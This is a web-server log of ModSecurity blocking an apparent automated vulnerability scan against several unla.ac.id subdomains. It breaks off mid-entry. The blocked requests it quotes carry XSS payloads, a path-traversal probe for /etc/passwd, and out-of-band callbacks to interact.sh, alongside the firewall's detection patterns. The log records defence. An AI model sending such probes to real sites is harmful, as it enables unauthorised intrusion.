[Tue Aug 29 11:52:52.076847 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAnd3NwAAAAI"]
[Tue Aug 29 11:52:52.239082 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAoW7J4AAAAJ"]
[Tue Aug 29 11:52:52.248017 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15pMCo-f0AAAnTlWkAAAAA"]
[Tue Aug 29 11:52:52.290562 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15pMCo-f0AAAnTlWsAAAAA"]
[Tue Aug 29 11:52:52.548416 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAoW7KMAAAAJ"]
[Tue Aug 29 11:52:52.621305 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoW7KQAAAAJ"]
[Tue Aug 29 11:52:52.627223 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnTlW4AAAAA"]
[Tue Aug 29 11:52:52.628835 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoVqqYAAAAH"]
[Tue Aug 29 11:52:52.644358 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoW7KUAAAAJ"]
[Tue Aug 29 11:52:52.644845 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnd3OMAAAAI"]
[Tue Aug 29 11:52:52.676042 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAoLfM0AAAAG"]
[Tue Aug 29 11:52:52.705631 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnd3OUAAAAI"]
[Tue Aug 29 11:52:52.771173 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoXJr0AAAAP"]
[Tue Aug 29 11:52:52.776509 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnd3OYAAAAI"]
[Tue Aug 29 11:52:52.847644 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAnd3OgAAAAI"]
[Tue Aug 29 11:52:52.849516 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoLfNAAAAAG"]
[Tue Aug 29 11:52:52.867827 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnHQqQAAAAT"]
[Tue Aug 29 11:52:52.868173 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAoXJsAAAAAP"]
[Tue Aug 29 11:52:52.874929 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoT7RsAAAAD"]
[Tue Aug 29 11:52:52.885097 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAocyeIAAAAR"]
[Tue Aug 29 11:52:53.581449 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15pcCo-f0AAAnHQqYAAAAT"]
[Tue Aug 29 11:52:53.599521 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pcCo-f0AAAoLfNQAAAAG"]
[Tue Aug 29 11:52:53.620583 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pcCo-f0AAAnHQqcAAAAT"]
[Tue Aug 29 11:52:53.667777 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pcCo-f0AAAnTlXoAAAAA"]
[Tue Aug 29 11:52:54.601201 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15psCo-f0AAAoZ6PoAAAAK"]
[Tue Aug 29 11:52:54.920801 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15psCo-f0AAAoZ6PwAAAAK"]
[Tue Aug 29 11:52:55.449711 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoZ6P4AAAAK"]
[Tue Aug 29 11:52:55.729504 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoPuaMAAAAM"]
[Tue Aug 29 11:52:55.821435 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAnHQqsAAAAT"]
[Tue Aug 29 11:52:55.829603 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAlUlyIAAAA0"]
[Tue Aug 29 11:52:55.860981 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoW7LIAAAAJ"]
[Tue Aug 29 11:52:55.867748 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAnHQqwAAAAT"]
[Tue Aug 29 11:52:55.881320 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] 